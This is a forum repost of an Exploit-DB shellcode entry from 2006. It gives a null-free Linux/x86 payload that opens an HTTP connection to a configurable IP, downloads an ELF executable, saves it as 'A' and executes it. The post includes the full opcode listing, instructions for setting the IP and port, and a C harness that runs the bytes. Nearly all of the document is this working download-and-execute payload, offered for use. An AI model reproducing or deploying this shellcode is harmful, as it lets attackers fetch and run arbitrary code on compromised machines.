Exploit Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() + Null-Free Shellcode (111+ bytes)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13355
Проверка EDB
  1. Пройдено
Автор
IZIK
Тип уязвимости
SHELLCODE
Платформа
LINUX_X86
CVE
N/A
Дата публикации
2006-10-22
C:
/*
 * (linux/x86) - HTTP/1.x GET, Downloads and execve() - 111 bytes+
 *
 * This shellcode allows you to download a ELF executable straight off a standard HTTP server
 * and launch it. It will saved locally it into a filename called 'A' in the current directory.
 * 
 * <CONFIGURATION>
 *
 * > The destination IP of the HTTP server is required (NO DNS!), use inet_addr() function result and 
 *   modify the value in [1*] from 0xdeadbeef to the actual IP, if the IP contains NULLs then a little 
 *   workaround requires. The simplest is to use ~inet_addr() followed by ``notl (%esp)`` to change back. 
 *
 * > The destination port of the HTTP server is 80 by default, it is located within the 4 upper bytes
 *   of the value in [2*] (0xafff). Stored in an invert format (~), so if any further modification 
 *   needed make sure to keep it stored in the same format.
 *
 * > The destination URL should be generated using the ``gen_httpreq`` utility. It will produce an
 *   assembly code which is a series of PUSH's and should be pasted as it is within in the marked place
 *   in the shellcode (look for the comment).
 * 
 * <LINKS/UTILITIES>:
 *
 *      gen_httpreq.c, generates a HTTP GET request for this shellcode
 *      > http://www.tty64.org/code/shellcodes/utilities/gen_httpreq.c
 *	backup
 *	> http://www.milw0rm.com/shellcode/2618
 *
 * - izik <[email protected]>
 */

char shellcode[] = 

	"\x6a\x66"              // push $0x66 
	"\x58"                  // pop %eax 
	"\x99"                  // cltd 
	"\x6a\x01"              // push $0x1 
	"\x5b"                  // pop %ebx 
	"\x52"                  // push %edx 
	"\x53"                  // push %ebx 
	"\x6a\x02"              // push $0x2 
	"\x89\xe1"              // mov %esp,%ecx 
	"\xcd\x80"              // int $0x80 
	"\x5b"                  // pop %ebx 
	"\x5e"                  // pop %esi 
	"\x68\xef\xbe\xad\xde"  // [1*] push $0xdeadbeef
	"\xbd\xfd\xff\xff\xaf"  // [2*] mov $0xaffffffd,%ebp 
	"\xf7\xd5"              // not %ebp 
	"\x55"                  // push %ebp 
	"\x43"                  // inc %ebx 
	"\x6a\x10"              // push $0x10 
	"\x51"                  // push %ecx 
	"\x50"                  // push %eax 
	"\xb0\x66"              // mov $0x66,%al 
	"\x89\xe1"              // mov %esp,%ecx 
	"\xcd\x80"              // int $0x80 
	"\x5f"                  // pop %edi 
	"\xb0\x08"              // mov $0x8,%al 
	"\x52"                  // push %edx 
	"\x6a\x41"              // push $0x41 
	"\x89\xe3"              // mov %esp,%ebx 
	"\x50"                  // push %eax 
	"\x59"                  // pop %ecx 
	"\xcd\x80"              // int $0x80 
	"\x96"                  // xchg %eax,%esi 
	"\x87\xdf"              // xchg %ebx,%edi 

	//
	// <paste here the code, that gen_httpreq.c outputs!>
	//

	"\xb0\x04"              // mov $0x4,%al 

	//
	// <_send_http_request>:
	//

	"\x89\xe1"              // mov %esp,%ecx 
	"\xcd\x80"              // int $0x80 
	"\x99"                  // cltd 
	"\x42"                  // inc %edx 

	//
	// <_wait_for_dbl_crlf>:
	//

	"\x49"                  // dec %ecx 
	"\xb0\x03"              // mov $0x3,%al 
	"\xcd\x80"              // int $0x80 
	"\x81\x39\x0a\x0d\x0a\x0d" // cmpl $0xd0a0d0a,(%ecx) 
	"\x75\xf3"              // jne <_wait_for_dbl_crlf> 
	"\xb2\x04"              // mov $0x4,%dl 

	//
	// <_dump_loop_do_read>:
	//

	"\xb0\x03"              // mov $0x3,%al 
	"\xf8"                  // clc 


	//
	// <_dump_loop_do_write>:
	//

	"\xcd\x80"              // int $0x80 
	"\x87\xde"              // xchg %ebx,%esi 
	"\x72\xf7"              // jb <_dump_loop_do_read> 
	"\x85\xc0"              // test %eax,%eax 
	"\x74\x05"              // je <_close_file> 
	"\xb0\x04"              // mov $0x4,%al 
	"\xf9"                  // stc 
	"\xeb\xf1"              // jmp <_dump_loop_do_write> 
	"\xb0\x06"              // mov $0x6,%al 
	"\xcd\x80"              // int $0x80 
	"\x99"                  // cltd 
	"\xb0\x0b"              // mov $0xb,%al 
	"\x89\xfb"              // mov %edi,%ebx 
	"\x52"                  // push %edx 
	"\x53"                  // push %ebx 
	"\xeb\xcc";             // jmp <_send_http_request> 

int main(int argc, char **argv) {
	int *ret;
	ret = (int *)&ret + 2;
	(*ret) = (int) shellcode;
}

// milw0rm.com [2006-10-22]
 
Источник
www.exploit-db.com

Похожие темы